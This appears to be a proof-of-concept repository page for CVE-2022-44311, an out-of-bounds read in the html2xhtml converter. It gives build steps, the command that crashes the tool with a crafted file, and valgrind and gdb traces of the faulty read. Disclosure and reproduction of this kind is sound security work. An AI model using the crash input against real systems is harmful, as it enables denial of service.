Associated Vulnerability
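Title: Html2xhtml buffer error vulnerability (CVE-2022-44311)
Description: Html2xhtml is a command-line tool, written by the individual developer Jesus Arias Fisteus, that converts HTML files to XHTML. Html2xhtml v1.3 contains a buffer error vulnerability caused by an out-of-bounds read in the function static void elm_close(tree_node_t *nodo) in procesador.c. An attacker can use a crafted HTML file to access sensitive files or cause a denial of service (DoS).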
Description
Proof of concept for CVE-2022-44311
Readme
# Description for CVE-2022-44311
html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.
# Reproduction
To reproduce the vulnerability, download a vulnerable version of html2xhtml (v1.3) and compile the project:
```
wget http://www.it.uc3m.es/jaf/html2xhtml/downloads/html2xhtml-1.3.tar.gz
tar -xzvf html2xhtml-1.3.tar.gz
cd html2xhtml-1.3
./configure
make
```
Once the project has been compiled, run html2xhtml from the project root against the proof-of-concept file included in this repository (CVE-2022-44311_crash), with that file copied into the project root:
```
./src/html2xhtml -t frameset ./CVE-2022-44311_crash
```
The command crashes with a segmentation fault, which the shell reports as:
```
zsh: segmentation fault ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
```
Attaching valgrind to the program can help us understand what is causing the crash:
```
$ valgrind ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753== Memcheck, a memory error detector
==267753== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==267753== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
==267753== Command: ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753==
==267753== Invalid read of size 4
==267753== at 0x11B18A: elm_close (procesador.c:944)
==267753== by 0x11B18A: err_html_struct (procesador.c:1889)
==267753== by 0x11BBB5: err_content_invalid (procesador.c:1291)
==267753== by 0x11BBB5: elm_close.part.0 (procesador.c:959)
==267753== by 0x11C4C0: elm_close (procesador.c:944)
==267753== by 0x11C4C0: saxEndDocument (procesador.c:233)
==267753== by 0x1144AE: main (html2xhtml.c:117)
==267753== Address 0x3ec404 is not stack'd, malloc'd or (recently) free'd
==267753==
```
Valgrind reports an invalid 4-byte read at procesador.c, line 944, from address 0x3ec404, which is neither on the stack nor inside any heap allocation. Running the same input under gdb (here with the pwndbg extension) confirms the valgrind output:
```
$ gdb src/html2xhtml
pwndbg> r -t frameset ./CVE-2022-44311_crash
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────────────────
RAX 0xb11ae
RBX 0x5555555dd344 ◂— 0x3
RCX 0x5a
RDX 0x2
RDI 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSI 0x555555573160 (elm_buffer) ◂— 0xd9810100028b8101
R8 0x1
R9 0x5555555ee520 ◂— 0x5555555ee
R10 0x0
R11 0x7ffff7df2800 (iconv_close) ◂— cmp rdi, -1
R12 0x5555555dd2d6 ◂— 0x0
R13 0x7ffffffedc70 ◂— 0x600000001
R14 0x5555555dd2d6 ◂— 0x0
R15 0x4
RBP 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSP 0x7ffffffedc30 ◂— 0x1
RIP 0x55555556718a (err_html_struct+474) ◂— cmp dword ptr [rbp + rax*4 + 0xc], 4
─────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────────────
► 0x55555556718a <err_html_struct+474> cmp dword ptr [rbp + rax*4 + 0xc], 4
0x55555556718f <err_html_struct+479> jne err_html_struct+489 <err_html_struct+489>
↓
0x555555567199 <err_html_struct+489> mov rbx, qword ptr [rbx + 8]
0x55555556719d <err_html_struct+493> test rbx, rbx
0x5555555671a0 <err_html_struct+496> jne err_html_struct+448 <err_html_struct+448>
↓
0x555555567170 <err_html_struct+448> cmp r12, rbx
0x555555567173 <err_html_struct+451> je err_html_struct+498 <err_html_struct+498>
↓
0x5555555671a2 <err_html_struct+498> xor edi, edi
0x5555555671a4 <err_html_struct+500> mov qword ptr [rip + 0x4d6d5], r12 <actual_element>
0x5555555671ab <err_html_struct+507> call new_tree_node <new_tree_node>
0x5555555671b0 <err_html_struct+512> mov dword ptr [rax + 0x18], 0x59
──────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────────────────────────────────────────
In file: /dev/shm/html2xhtml-1.3/src/procesador.c
939 static void elm_close(tree_node_t *nodo)
940 {
941 DEBUG("elm_close()");
942 EPRINTF1("cerrando elemento %s\n",ELM_PTR(nodo).name);
943
► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
949
```
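GDB confirms that the program reads from an invalid memory address while evaluating the condition on line 944. The instruction is attributed to err_html_struct because the compiler inlined elm_close into it, which matches the top frame of the valgrind trace. The source lines in question are: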
```
► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
```
# References
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44311
* https://cwe.mitre.org/data/definitions/125.html
File Snapshot
[4.0K] /data/pocs/6847a793f6571fa50617dba4f2c4c45e201718ab
├── [8.0K] CVE-2022-44311_crash
├── [544K] html2xhtml-1.3.tar.gz
└── [8.3K] README.md
0 directories, 3 files